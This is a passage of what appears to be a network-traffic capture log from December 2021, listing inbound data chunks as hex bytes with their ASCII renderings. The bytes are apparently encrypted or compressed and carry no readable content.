2021-12-01 18:26:22 UTC	258	IN	Data Raw: 5c 11 47 00 b6 b3 e2 67 19 b2 9f c3 6d ef 9d a5 a8 1d 44 a4 15 2c 0f 6d b2 a9 e2 18 d0 ee 6d 4a 20 fa e4 f7 89 20 ea df 60 71 61 db 89 81 a8 74 da 27 2e 43 11 61 c2 2e 9b 2b 64 55 be 2c 91 e7 63 c1 33 c5 7d 4f 91 f3 2a b4 bc 64 b4 28 81 9f d5 4f be 1e af 13 2e fc a1 74 e6 e2 a8 a2 a1 ce 64 68 c3 77 cd c4 28 6e c2 fb d5 e3 c5 1e a1 7b 84 f7 d2 fc c3 c2 67 ff c1 42 bd 74 cd 3c 67 16 5d 99 a7 78 c9 28 39 c1 38 35 e6 f8 8a e3 d8 1e 23 48 77 d8 ce cb a6 52 a4 d1 ae 2d 9b 26 96 de c5 59 e7 2f 7f f2 ba ba 14 e3 0c 6c 63 84 8c 36 3b 6f b5 13 39 d5 f7 0d 1b 02 7e e9 ef 5e 65 f9 18 19 1d 50 40 2b 8e e1 14 a1 41 d1 c2 03 d3 c5 80 14 02 94 8f 36 3f eb 28 f4 de ee 69 0d 99 b8 79 fe c9 70 90 ed 7b 7a 69 70 aa 71 00 be 3f 08 64 cf 2d d2 16 ff 59 dc 21 f0 69 40 f0 02 9c Data Ascii: \GgmD,mmJ `qat'.Ca.+dU,c3}O*d(O.tdhw(n{gBt<g]x(985#HwR-&Y/lc6;o9~^eP@+A6?(iyp{zipq?d-Y!i@
2021-12-01 18:26:22 UTC	259	IN	Data Raw: 14 d3 4a c0 2d 5e d6 54 bf b9 2e 0b d1 fb 1b e8 6a 66 ca a4 b1 b1 bb f2 91 50 b8 e3 8f f0 d4 08 fd 97 2e 93 d8 e3 84 8a 28 1d c5 ee a5 a9 fe 7b 6c 62 8f 69 d6 be 7e 22 63 f5 80 82 af 2d 64 0d e0 8b 61 02 d5 c5 45 ec 3a 13 27 b5 2d 44 be 8b 6e de 15 38 9e 58 d8 4b 18 c1 0e c7 f4 cf 2e 8c d5 21 e9 d0 1f 93 9d e5 00 86 3a f2 0c 09 d8 77 d6 28 71 ec 92 6a 90 91 cc a6 e8 92 58 9c 5f 77 8b 57 c5 a0 f0 ef 0d bf 40 1a 3d 08 f4 bd 7b 9d 21 f2 ab db 5a 08 e2 10 06 14 15 7f 66 ab 09 aa 7c 52 f6 51 b5 a4 95 65 16 6f 5f ae f9 6d 3f b1 82 98 c0 53 f2 3a 98 a9 b2 15 b7 6c 06 2f 52 86 46 70 cb 20 6c 65 41 89 6c 11 dc 68 f7 f9 50 37 9e dc ff 91 b6 f7 fc 2e 0c 9a 47 12 34 0e d9 f9 11 85 4d 33 b5 7d 57 56 53 e2 6a 32 a3 cd a9 53 cd f0 6b 50 ba f2 36 89 5f f4 48 ff 9d 16 43 Data Ascii: J-^T.jfP.({lbi~"c-daE:'-Dn8XK.!:w(qjX_wW@={!Zf\|RQeo_m?S:l/RFp leAlhP7.G4M3}WVSj2SkP6_HC
2021-12-01 18:26:22 UTC	260	IN	Data Raw: 5b a8 fd a1 2c 67 e3 a8 ca 21 cf 64 14 40 76 cd 50 aa 6f c2 5d 58 e2 c5 a6 2d 7a 84 3f 58 fd c3 20 fd fe c1 b2 76 75 cd c0 b2 17 5d 95 4a 79 c9 24 f4 c0 38 09 0d f9 8a bb 4c 1f 23 38 e6 d9 ce 4b 2c 53 a4 41 34 2c 9b 82 1e df c5 99 7f 2e 7f 20 36 bb 14 07 81 6d 63 6a 65 37 3b 7f 2f 12 39 f3 6b 0c 1b 44 f4 e8 ef 06 b1 c2 44 06 c3 3f 24 3e 4e 93 48 58 8f a3 b6 66 0f f7 b2 a2 c7 e6 ea 9a bc d8 06 46 02 83 69 cd 7a dc 0d 1d 10 1f f4 2a bc 08 21 83 75 1b 45 46 ce 09 64 bb 90 d9 16 99 c7 dd 55 aa b4 41 80 48 2c db 7a 5a 2e 0d 3b c1 7b 44 fe ba 67 f5 f8 1a 36 a6 a9 0f 86 9f f5 3f c6 bc 68 09 c3 86 5a d2 73 27 19 23 fe 29 44 a9 4e 19 53 be 8c c7 fb 05 f0 74 cf c5 8e 3a f1 23 09 a2 ed d0 d4 1f c6 d8 85 c8 59 0b db 37 ba b8 da 1c 5c 5a 04 aa f4 ce 05 af f6 cc c9 53 Data Ascii: [,g!d@vPo]X-z?X vu]Jy$8L#8K,SA4,. 6mcje7;/9kDD?$>NHXfFiz*!uEFdUAH,zZ.;{Dg6?hZs'#)DNSt:#Y7\ZS
2021-12-01 18:26:22 UTC	261	IN	Data Raw: 31 b9 38 74 a8 2e a8 a7 a1 5a d0 b4 21 9d d0 7a e0 e9 84 72 f2 3a f2 0c 6c fc 1e ed 28 01 ec f7 36 e2 91 ad c9 c8 e2 0b f9 30 19 ed 57 b1 a0 87 de 5e 88 1c 2a 76 38 86 8f 34 9d 51 a6 dd db 28 2d 83 74 26 14 46 7f 12 ca 0a c9 7a 37 fc 36 b8 cd a3 0e 36 02 5e c1 ee 1c 24 c2 98 ed 96 24 ce 43 83 e8 84 56 92 29 40 68 46 cf 4e 3b 89 0e 2b 65 32 89 07 6c 9b 28 a2 10 1b 77 fb 57 96 d1 96 d2 81 6e 6d 03 28 52 55 81 bc b9 5d 22 39 73 d6 97 0f 16 3f 57 51 72 f0 e3 e7 13 ac 30 04 10 df ca 0c c9 5f 3f 53 bf 9d 5d 25 b8 66 c9 69 2b f7 f7 00 c7 a9 82 fc 28 5a cd c7 6e 28 55 05 cd c6 48 f2 ce 0f a2 06 2a b7 f2 0c d7 f4 1d ea 12 e2 46 a5 cc d2 f0 73 62 ca c8 6a 5a 8e 6a 6b 05 6c db a9 46 cb b7 84 b3 d4 b6 0f 42 e8 23 31 04 1b 37 0b 49 2a ce 7f 55 b1 d2 8e 3f e7 df af 03 Data Ascii: 18t.Z!zr:l(60W^v84Q(-t&Fz766^$$CV)@hFN;+e2l(wWnm(RU]"9s?WQr0_?S]%fi+(Zn(UHFsbjZjklFB#17I*U?
2021-12-01 18:26:22 UTC	263	IN	Data Raw: ba 1f 63 4a 3a 73 3b 1e 02 66 39 92 40 50 1b 00 c9 8d ef 60 d2 99 18 04 aa 3d 40 25 39 bc 14 67 f6 bf c2 64 62 ad 80 90 b2 b5 8f ac 8f 8b 28 56 6e 8e 69 cd 29 b9 79 4a 79 22 90 2a cb 1d 69 98 1a 07 00 5f 8f 7b 64 de 9d 8f 16 d4 e9 b4 21 c9 d9 33 f0 27 2c a8 7a 35 2e 6b 3b b5 08 7d 92 88 04 e8 d8 07 5f a5 c7 0f e8 b7 87 29 a7 8c 05 66 e3 9c 28 c9 14 3c 77 19 8b 35 28 f1 6e 3a 20 be fe db 9a 1b 95 42 b9 cb e2 21 94 53 29 93 8c d3 a7 18 a9 8a e1 c7 2f 0b b7 36 df f0 bc 1d 33 6b 24 dd 9b b9 5a 93 99 ca a0 49 f0 cc 75 a9 b5 ee cd 44 63 2c 30 ea ea 13 1a 01 8b f1 85 f6 60 78 a3 ee 2c 4d cb 9c 21 19 31 fe 87 33 d0 5c 21 51 20 d6 25 57 52 3a 08 e5 b6 5a 38 4a 3f 11 cd e4 30 db 04 78 fd 46 1d ad d7 34 14 40 b3 da 32 28 f4 fb 18 23 96 9d 25 81 ee 74 ac a1 e1 d1 e9 Data Ascii: cJ:s;f9@P`=@%9gdb(Vni)yJy"*i_{d!3',z5.k;}_)f(<w5(n: B!S)/63k$ZIuDc,0`x,M!13\!Q %WR:Z8J?0xF4@2(#%t
2021-12-01 18:26:22 UTC	263	IN	Data Raw: 35 e2 c4 7d 4b 42 f2 43 a2 7b 65 d1 40 56 9e ba 7d 73 1f 81 5b fe fd d9 2c 36 e3 a8 ca 48 cf 02 14 1f 76 bf 50 f8 6f a4 5d 0f e2 bd a6 3a 7a e1 3f 1f fd a6 20 d2 fe c1 b2 54 75 80 c0 bd 17 27 95 78 79 a5 24 e4 c0 59 09 0c f9 cc bb 07 1f 51 38 a4 d9 a8 4b 7f 53 dc 41 44 2c 9b 82 50 df b7 99 3e 2e 19 20 65 bb 78 07 df 6d 10 6a 14 37 52 7f 6c 12 50 f3 40 0c 1b 44 95 e8 83 06 bd f8 7f 71 c3 51 2e 51 4a e0 3a 2b 9c d0 b1 03 0d c4 ee fe b2 95 8f e8 ea 84 4b 50 17 9f 1d a8 4d ec 0a 2f 0b 1f f1 28 ae 7b 69 ec 72 1f 73 4a e1 68 09 de 9d d3 16 99 8c b3 42 d8 a0 31 84 2d 48 8b 1b 29 5d 7a 54 b3 6c 21 92 df 70 81 b0 69 2a c1 a9 60 8c c0 e2 5a d5 d0 67 25 8a e9 5a bb 70 4e 59 7c ee 5b 50 85 0b 6c 20 db a2 a9 ce 68 fd 2b cc a4 8c 4f f0 0f 4c d2 fe a3 c5 68 c0 aa 93 97 Data Ascii: 5}KBC{e@V}s[,6HvPo]:z? Tu'xy$YQ8KSAD,P>. exmj7RlP@DqQ.QJ:+KPM/({irsJhB1-H)]zTl!pi*`Zg%ZpNY\|[Pl h+OLh
2021-12-01 18:26:22 UTC	265	IN	Data Raw: e2 61 61 d5 b7 45 83 3a 60 74 da 42 22 d8 ff 1a fe 62 6e ff 31 aa 38 7d a8 52 a8 b9 a1 47 d0 b6 21 9b d0 70 e0 9a 84 1d f2 5c f2 78 6c fc 1e ed 28 17 ec f4 36 f9 91 af c9 8d e2 04 f9 6e 19 bd 57 eb a0 c0 de 63 88 21 2a 66 38 ae 8f 17 9d 4e a6 d7 db 31 2d be 74 56 14 67 7f 09 ca 0d c9 71 37 fc 36 b8 cd 8c 0e 26 02 7e c1 fc 1c 39 c2 9a ed d9 24 e5 43 89 e8 ac 56 ca 29 73 68 2d cf 39 3b a6 0e 04 65 07 89 5c 6c f3 28 c6 10 5b 77 af 57 d5 d1 87 d2 a1 6e 3f 03 1e 52 0c 81 d8 b9 50 22 66 73 85 97 5f 16 63 57 45 72 e1 e3 a1 13 8c 30 46 10 8c ca 3b c9 69 3f 53 bf 9d 5d 0a c9 48 a0 71 4e ad a8 1c b7 a7 ec a0 28 0f cd c7 1f 21 3c 03 a8 d5 17 d5 a2 01 d1 17 2a d6 f2 23 a6 dc 74 fb 77 b7 19 b4 be c2 80 7e 10 db 97 40 68 c2 6a 77 74 67 b2 b4 23 96 e8 c7 dc fc c3 03 2c Data Ascii: aaE:`tB"bn18}RG!p\xl(6nWc!f8N1-tVgq76&~9$CV)sh-9;e\l([wWn?RP"fs_cWEr0F;i?S]HqN(!<#tw~@hjwtg#,
2021-12-01 18:26:22 UTC	266	IN	Data Raw: 10 32 a4 2d 18 70 9b d2 20 be c5 fa 51 45 7f 41 0c dc 14 62 ba 1e 63 36 3a 7a 3b 16 02 71 39 81 40 63 1b 37 c9 87 ef 60 d2 8c 18 5f aa 1c 40 38 39 83 14 59 f6 bf c2 70 62 ab 80 98 b2 e1 8f ad 8f 8e 28 45 6e 8a 69 92 29 81 79 3d 79 14 90 2e cb 02 69 8e 1a 43 00 5a 8f 31 64 d9 9d b1 16 ee e9 b8 21 f6 d9 41 f0 48 2c 8f 7a 3f 2e 7f 3b ac 08 72 92 ba 04 f3 d8 1f 5f a8 c7 03 e8 a5 87 5a a7 f5 05 75 e3 9b 28 d4 14 29 77 0e 8b 3a 28 e8 6e 2a 20 b2 fe c5 9a 0d 95 58 b9 81 e2 4f 94 0f 29 f7 8c d4 a7 01 a9 c4 e1 f3 2f 03 b7 30 df bd bc 32 33 64 24 a4 9b ca 5a b7 99 ce a0 50 f0 97 75 9b b5 ee cd 12 63 13 30 fe ea 08 1a 09 8b e8 85 f9 60 26 a3 97 2c 1f cb c4 21 46 31 cc 87 16 d0 31 21 22 20 fc 25 79 52 23 08 b7 b6 1c 38 15 3f 4c cd ef 30 d1 04 60 fd 66 1d e9 d7 17 14 Data Ascii: 2-p QEAbc6:z;q9@c7`_@89Ypb(Eni)y=y.iCZ1d!AH,z?.;r_Zu()w:(n* XO)/023d$ZPuc0`&,!F11!" %yR#8?L0`f
2021-12-01 18:26:22 UTC	267	IN	Data Raw: e2 28 06 55 15 1b 66 ae 6b 80 18 59 90 45 dd cd ff 5d 7a 5b 31 92 89 48 4d 87 f6 a0 b6 78 8a 00 e2 9d f0 24 f3 5b 40 0d 1a a1 0c 4f e5 4d 42 0a 41 e7 6c 18 c7 5a f7 7f 68 1b 9e 04 e4 b4 b6 a6 c5 32 0c 40 5c 3d 34 ef e0 cd 11 50 56 1c b5 fb 6e 42 53 32 71 00 a3 8e 93 7a cd 5e 70 71 ba a6 0c e9 5f 6c 53 da 9d 2f 79 ce 24 ac 05 59 9e ab 73 86 c2 e6 a0 4c 0f 84 b4 00 4d 26 77 91 e6 0b b6 a2 6e cb 72 5a d6 d2 50 85 b0 78 8f 76 84 2f c4 be a7 95 1f 01 be bc 36 35 c2 18 04 05 0b db c0 15 a5 ee a4 e0 90 e2 6e 07 9c 6e 50 58 1b 74 57 3c 69 bc 17 27 c3 b7 e1 51 8a ab c6 40 7f b8 72 b5 26 85 d7 e8 44 9e 6c 58 46 a5 c9 a6 1b 60 3f b5 f1 ac 5e 6c 49 9e 94 6c a6 3a 4e 51 86 24 3b 22 47 91 5c ae f4 73 b6 36 51 0f 19 2a 2c a3 6d 89 29 84 a8 54 f0 c0 15 42 be 1a b2 f8 56 Data Ascii: (UfkYE]z[1HMx$[@OMBAlZh2@\=4PVnBS2qz^pq_lS/y$YsLM&wnrZPxv/65nnPXtW<i'Q@r&DlXF`?^lIl:NQ$;"G\s6Q*,m)TBV
2021-12-01 18:26:22 UTC	269	IN	Data Raw: 70 65 3e fd 09 64 bb 9d d3 41 99 b8 dd 6d aa d9 41 77 ee 3e 07 05 29 e1 1c b3 8c 08 8b 92 94 2a a5 8a 1d 33 82 b5 05 89 b4 e2 0f c9 b9 66 4a 87 8c 7b cf 66 27 19 1b cd 29 47 e8 2f 1f 43 b2 97 d3 9a 68 95 2b eb d0 8e 06 fa 66 5d 93 e2 d0 ce 3b dd d8 88 f9 48 6a b7 42 96 eb eb 01 44 01 10 8d e9 d6 39 a6 ea d8 a0 3d 9b c1 07 c7 d0 82 fe 05 63 43 30 8c bc 0e 68 1a fe fb e9 c9 15 2e d1 b9 2c 29 cb f0 63 19 50 cc 87 33 d0 31 21 22 20 a0 64 34 24 4a 6d d4 e9 6e 75 7a 5e 3f bf 80 59 b7 65 14 dd 46 4e ad a3 59 71 2f d2 a0 5e 4f 91 97 6a 56 b6 f8 6a af 9e 10 c9 cd 8f bd ba 29 75 fd 00 44 e1 b2 76 6b a9 0b 80 71 c5 47 fd 58 36 65 15 77 98 87 f7 aa be 3e e6 e6 06 75 15 46 5f 37 e3 95 66 64 c6 a1 82 c9 65 84 ea ae 55 7d 31 f1 7b 10 60 1a 7d 21 fb 55 8a e9 54 80 ba eb Data Ascii: pe>dAmAw>)*3fJ{f')G/Ch+f];HjBD9=cC0h.,)cP31!" d4$Jmnuz^?YeFNYq/^OjVj)uDvkqGX6ew>uF_7fdeU}1{`}!UT
2021-12-01 18:26:22 UTC	270	IN	Data Raw: 72 d0 e3 e7 13 a8 30 1d 10 89 ca 3e c9 5f 3f 53 bf c1 5d 25 b8 1b c9 59 2b dd f7 49 c7 9e 82 f7 28 66 cd da 6e 29 55 18 cd 91 48 c5 ce 4e a2 2e 2a 85 f2 29 d7 c3 1d fb 12 e1 46 a9 cc 94 f0 2d 62 e2 c8 41 5a ab 6a 6a 05 58 db 81 46 f1 b7 8a b3 f5 b6 16 42 f9 23 50 04 47 37 0b 49 56 ce 4b 55 80 d2 db 3f d6 df 91 03 16 d7 1c db 42 f1 b8 9a 33 f1 1f 34 66 f6 95 c3 48 14 46 e9 82 ef 2a 03 2c f0 f9 18 95 48 7c 3e da 48 4c 7e 2e c5 32 cb 99 01 db 5b 35 66 37 44 48 c2 01 e5 45 a4 a8 07 a3 a5 5a 30 f8 6c e6 9d 01 19 91 a4 8b 4b 65 a6 0c f6 c4 4e 37 de 03 f1 a7 da e6 15 6f 75 b5 81 fc 42 65 db 2a 2f d8 e7 bf 54 d0 ca 51 e6 11 35 e8 c4 11 4b 04 f2 7a a2 68 65 da 40 55 9e b9 7d 57 1f af 5b cd fd c8 2c 21 e3 dc ca 61 cf 05 14 1a 76 ed 50 d0 6f a3 5d 03 e2 ad a6 7d 7a Data Ascii: r0>_?S]%Y+I(fn)UHN.)F-bAZjjXFB#PG7IVKU?B34fHF,H\|>HL~.2[5f7DHEZ0lKeN7ouBe*/TQ5Kzhe@U}W[,!avPo]}z
2021-12-01 18:26:22 UTC	271	IN	Data Raw: 1e 6a b7 42 df a7 d0 1d 47 77 64 84 da e1 12 89 d1 eb fa 3d f0 c1 0d d9 d9 81 bf 52 11 6d 55 f4 8f 67 1a 6e 8b 6f a1 d8 60 aa e3 81 2c 6d cb 95 21 06 31 9d 87 41 d0 58 21 52 20 d4 25 5d 52 25 08 ba b6 6e 38 3c 3f 4d cd e9 30 d2 04 7a fd 22 1d c1 d7 20 14 61 b3 c1 32 22 f4 f2 18 56 96 f8 25 fc ee 7f ac b8 e1 cf e9 4a 1a 98 75 44 93 b2 15 2c cc 79 a0 10 a2 25 94 3a 42 00 7d 05 ed 87 95 61 da 7f aa 23 2b 34 7b f9 70 76 d9 81 03 25 ae ae b3 88 11 a6 92 2a 0f f9 50 21 45 ad 74 1a ba e8 83 9b 78 40 54 28 99 3f e9 61 4e 6f 95 8d c1 e8 fc 0c 93 7b b5 4d f6 3b ff c1 e6 54 4d 1f f0 28 fe 11 19 2e 47 23 f5 9d cd ee 71 14 2f 97 87 13 12 bd d2 29 ef 1a 21 43 be 00 6f ce af 1c 9b 73 0b ec 54 b6 5b 7d 88 23 ed 8c c2 42 a5 a6 48 86 be 4f 81 9d ec 52 f2 be d7 4c 6c 5f 51 Data Ascii: jBGwd=RmUgno`,m!1AX!R %]R%n8<?M0z" a2"V%JuD,y%:B}a#+4{pv%*P!Etx@T(?aNo{M;TM(.G#q/)!CosT[}#BHORLl_Q
2021-12-01 18:26:22 UTC	272	IN	Data Raw: 9c 93 e9 05 1b 89 ee 48 69 00 ae 54 c3 34 58 3e 8a 23 7f 02 7f c3 c8 da 26 d5 6d 9b 44 c7 d6 35 46 be 73 c2 1b 4e 85 e8 f1 bd e5 02 49 f0 94 18 a6 68 f0 3f 86 40 85 7f 47 f3 e2 ca f4 01 b6 5b 51 10 a8 45 2c 48 dc e4 29 38 19 06 f0 0b a4 31 be d6 03 9c 56 d3 61 a5 d9 93 91 a7 50 1e 38 4f 5e 24 d1 f0 d5 d0 3b 14 1c 55 68 80 9a 76 a3 da 76 6d 29 e6 d0 0e 0c cb 25 88 d1 34 87 44 cf 4a 24 64 98 a3 09 cd 06 41 30 2a 67 7c 0b dd 1d 5a 9b 2f 13 2d 53 01 1a cb 14 37 d6 15 76 78 7e 51 9d 75 71 5c 60 ce 76 a7 14 44 37 3e 67 b3 70 21 d2 9c 72 b3 08 07 7e c1 d2 99 ee 94 11 e5 7a 25 88 6a 8b 08 50 3b 39 ba 6e c5 90 39 c1 31 7d 4a 10 a5 17 40 18 26 2f 83 20 c5 71 98 51 32 ce 21 0c 8f a0 06 ba 27 d7 6b 3a 6b 8f 7e 02 7c 8d f2 40 8c af 45 c9 7c 5b 07 d2 5e ac 70 aa eb f4 Data Ascii: HiT4X>#&mD5FsNIh?@G[QE,H)81VaP8O^$;Uhvvm)%4DJ$dA0*g\|Z/-S7vx~Quq\`vD7>gp!r~z%jP;9n91}J@&/ qQ2!'k:k~\|@E\|[^p
2021-12-01 18:26:22 UTC	274	IN	Data Raw: 5a dd d4 32 4f b6 92 74 25 e2 8a 46 c2 9e 47 ac cd 2a bf a1 4c 7b 8d 34 28 ff dd 76 6b 86 09 e7 14 d6 17 e6 37 21 00 0e 04 a5 e2 f4 da 9e 3e 96 e5 23 1a 1a 22 78 5e bb e7 27 16 d7 e0 f6 c9 54 86 dd cb 52 2d 79 9e 37 51 2b 7e 68 44 e1 26 fe e9 25 81 8a 93 8a db 0f ad c0 ee 84 34 84 ab f6 86 dd 4d e9 88 81 6b dc aa 85 55 f7 f3 4d ba f3 19 62 63 73 81 c5 ca 05 27 2f 8d 8f 00 0f b1 fb 2c ed 5f 21 27 b8 2f 65 db 8b 3d 8a 74 1c ea 44 a8 71 76 ce 61 e9 f4 6e 2c 98 b0 40 99 96 6d 85 8c 84 72 1b 3e a4 65 1e d4 6b c3 44 30 80 fe 59 f3 91 cc 1b ea aa 3d 98 2f 4b ee 16 a9 cc 9f bd 3f 79 6a 7c 7a 4a ae fa 1a f1 70 d3 dd a9 23 2d e2 b5 02 40 70 0d 0b a3 05 a8 6c 52 c4 5e af a8 9e 6a 7a b7 31 82 fb 79 2c b6 93 b9 de 56 ef 22 86 e8 f0 78 f6 7e 32 01 6e aa 5c 49 8a 6d 27 Data Ascii: Z2Ot%FG*L{4(vk7!>#"x^'TR-y7Q+~hD&%4MkUMbcs'/,_!'/e=tDqvan,@mr>ekD0Y=/K?yj\|zJp#-@plR^jz1y,V"x~2n\Im'
2021-12-01 18:26:22 UTC	275	IN	Data Raw: 70 b3 c5 b5 18 45 c5 24 9f e6 20 5e de 82 f3 9c b4 e0 61 75 14 b6 e8 e0 27 52 a9 1f 5b f2 84 b1 38 ed af 46 92 0a 5a e9 c4 ac 4b 60 97 46 c7 7d 00 f7 32 59 ea bc 1e 6a 73 fc 3e f8 89 c8 43 3d e3 33 ca 57 bd 01 75 02 13 80 25 e9 0a ba 1c 60 e2 3f a5 46 1f e8 5a 06 8e a6 6d a7 8a a4 ca 08 75 0d c4 86 72 2f f8 78 17 a8 50 ed 90 4a 66 33 9c f9 c8 6e 1f 9d 38 82 ab ab 2a 64 36 f0 2e 77 40 f3 e7 4c af f6 ab 02 40 1e 50 7f d3 7b 73 ba 6d fb 69 6a 45 54 1c 67 61 4a c0 72 42 7e 3c bd bf ef 06 44 fb 48 03 c5 32 25 22 4a d3 26 6d 9f a2 b1 77 35 c4 92 fb e5 fc e1 ad f7 8f 4b 22 7d ea 3e a2 5e 8f 4d 0e 10 02 f1 27 a7 1e 3e 83 6d 46 34 78 fc 5b 01 df f4 a1 73 fa 9d b4 4e c4 d9 41 80 4a 6b be 0e 09 57 7e 4f a4 65 65 fb ad 61 e2 ac 06 2d b8 90 60 ff c5 d0 35 d0 e6 31 77 Data Ascii: pE$ ^au'R[8FZK`F}2Yjs>C=3Wu%`?FZmur/xPJf3n8*d6.w@L@P{smijETgaJrB~<DH2%"J&mw5K"}>^M'>mF4x[sNAJkW~Oeea-`51w
2021-12-01 18:26:22 UTC	276	IN	Data Raw: 86 ce 2b ba e4 e8 98 02 8f fc e3 c0 98 7a f8 a2 aa 6a c5 a3 94 78 dd f8 50 81 96 2f 63 2a 9b e9 f6 c6 10 08 29 9a 87 32 04 b6 c2 37 ea 4e 19 63 bf 5e 41 cc 96 1e 8a 7a 1c 9e 31 e5 3a 4a cd 69 ec 91 cd 4b a4 b0 6a 8c a9 5e e0 5f 86 21 97 4e a1 69 0f d5 6c cb 5c 08 a8 f7 45 f3 e3 a5 b9 9c 8d 2a bd 3e 7a e7 57 84 e4 a6 9f 6f c1 5d 18 3d 5c b6 e3 7b 9d 03 a7 eb b3 3f 41 8e 31 7e 71 76 0a 12 af 3c c9 db 37 c3 7e 9a a8 8b 48 15 6e 55 a4 fb 4c 2c b6 9e ba b6 24 07 43 b1 a0 b3 24 96 48 34 0d 5e a6 7e 5e 86 7a 2d 17 38 cc 14 3b c7 28 16 10 3b 3f d9 32 90 82 c6 b7 a6 07 6d 6f 1a 3d 58 e5 85 cb 41 43 22 1b e2 97 a3 16 00 1f 36 17 d7 a8 fd 7c ba 5e 36 7f d6 ae 69 bb 0f 5e 27 d7 9d 5d 58 b9 77 a1 60 47 f2 b2 0b a2 a1 f7 d4 4d 4a b5 e3 6e e1 55 24 85 a0 21 da ab 21 d2 Data Ascii: +zjxP/c)27Nc^Az1:JiKj^_!Nil\E>zWo]=\{?A1~qv<7~HnUL,$C$H4^~^z-8;(;?2mo=XAC"6\|^6i^']Xw`GMJnU$!!
2021-12-01 18:26:22 UTC	277	IN	Data Raw: 84 3e 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 ba 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 98 32 f4 f0 cc 0c f2 b9 fe 4c d8 57 eb cb ed b7 bf 25 de 9a c0 10 1e 38 21 f8 23 1d 66 59 86 Data Ascii: >g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z2LW%8!#fY
2021-12-01 18:26:22 UTC	279	IN	Data Raw: a2 28 39 ef 44 bd d2 95 49 09 e7 66 d9 f9 5f 19 30 a8 ca a0 f0 9a b4 8a 22 a7 49 30 9e 04 ab d1 22 60 f1 58 b0 25 ab a5 ec 60 4c 3e 69 7d 60 84 33 e1 9f 81 1c ab 3e e6 76 64 b2 39 83 69 44 8a d5 26 f8 25 86 42 09 dc 96 d5 0b 2a 35 61 52 ec c7 7d e4 02 43 8e 64 ef 2d 57 01 5d e6 58 4b bc d7 dc 25 99 77 3a d5 08 4e 02 58 53 df 8f 86 f8 2a e7 23 7b fd b4 a5 70 15 56 7d 73 ee e0 4e 5e 48 e2 05 b7 31 88 08 81 5c ef d8 fd 99 d8 b9 cd a0 c6 b2 44 98 f8 c4 80 d6 ca 25 c5 00 49 7b 6e 4d 55 fc 51 c2 88 b6 ce 6e ee ff 5d ea be db bb 94 2d c3 11 74 0e 3b 01 e6 73 61 8e be c7 b0 c7 c2 6a 04 40 80 dd 81 cd 75 76 4e ad d1 3d ae 03 17 eb 91 ec 06 b4 b5 48 a8 27 08 d6 23 d3 94 21 0f 0d b3 08 88 0e 69 00 a5 12 d0 65 87 1a 52 c3 9f 4e cb c3 1b 14 24 32 d2 37 5d db a2 df 11 Data Ascii: (9DIf_0"I0"`X%`L>i}`3>vd9iD&%B5aR}Cd-W]XK%w:NXS#{pV}sN^H1\D%I{nMUQn]-t;saj@uvN=H'#!ieRN$27]
2021-12-01 18:26:22 UTC	279	IN	Data Raw: 41 e7 25 a5 43 7c 2b 14 40 a4 19 69 6d 96 bf 28 f7 8d 8b e8 3b 2f 24 20 af f8 0c 06 7a af f0 bf 5c 5c 90 3a 2f 4e 92 8c f8 6f 47 74 72 29 69 a7 23 e8 b7 a4 81 66 38 67 80 ef 55 75 60 94 3c 0f 9f 73 63 ef 51 29 b3 f7 fc ae 15 17 5d 5e 79 53 64 3c 88 46 23 80 85 06 98 56 e5 f9 8f dc ad b3 14 72 f1 3a f2 0c 68 a0 1e a2 d7 8e ec 92 8e 90 91 cc c9 e8 e2 58 b9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 b8 db 5a 2d e2 74 06 14 15 7f 66 ca 6b c9 18 ef 90 36 dd c3 e0 b4 74 02 85 c8 44 3d f5 c3 ba 20 97 70 e2 2a 91 c8 80 24 9c 4e 32 09 77 ef 6f 5a 8b 60 2d 11 61 eb 09 4c b5 5d 99 30 01 19 be 13 ab 82 96 bf aa 0a 69 2d 51 5f 3e a5 e0 b9 11 22 56 73 b5 3a 45 e1 b8 be 3b eb 1b 0a d9 8a 75 d9 3a 89 02 71 2e 53 e6 d7 19 26 25 d1 55 20 9d 25 4f b2 26 1e Data Ascii: A%C\|+@im(;/$ z\\:/NoGtr)i#f8gUu`<scQ)]^ySd<F#Vr:hX_W?n8{!Z-tfk6tD= p$N2woZ`-aL]0i-Q_>"Vs:E;u:q.S&%U %O&
2021-12-01 18:26:22 UTC	281	IN	Data Raw: 45 c5 a2 0c 6b 51 be 79 7b 89 d0 ea 19 52 e4 4d c5 a6 14 49 44 73 4c 27 8b 23 02 f1 77 b8 49 4d c1 d3 a7 65 15 6a d1 31 44 31 00 cf 38 09 18 7a 72 b3 12 fb 63 bc 3e ac fd 06 9b 19 5c c5 c3 59 8e c3 e7 de c5 99 51 2e 3f 97 0d fe 9f 07 f6 6e a5 2b c5 f0 d0 35 4b 99 3b b3 f7 0d 90 4c 88 e9 e6 43 59 f8 54 72 6c 10 bf 96 d2 d4 90 f0 83 c3 83 88 a4 85 ab 39 fa 0d c7 63 c3 2e 38 e5 6f ef 69 cd 29 f0 f2 48 f2 79 d1 44 c2 3e e2 ec 56 73 c6 7f 70 ce 8f b1 d8 e0 e9 d5 64 d9 0f ea eb be bd c1 6e d3 32 d7 3b 06 34 c1 08 68 11 1d 0c c0 27 af 16 3e 03 29 63 30 03 81 a8 55 33 da 1c 16 c3 bc 55 89 77 7c 8b 5b 28 c9 e5 d8 04 73 c0 a9 9a 29 1e ee f5 2f 4e 6b 74 31 29 d2 c0 28 03 4c 71 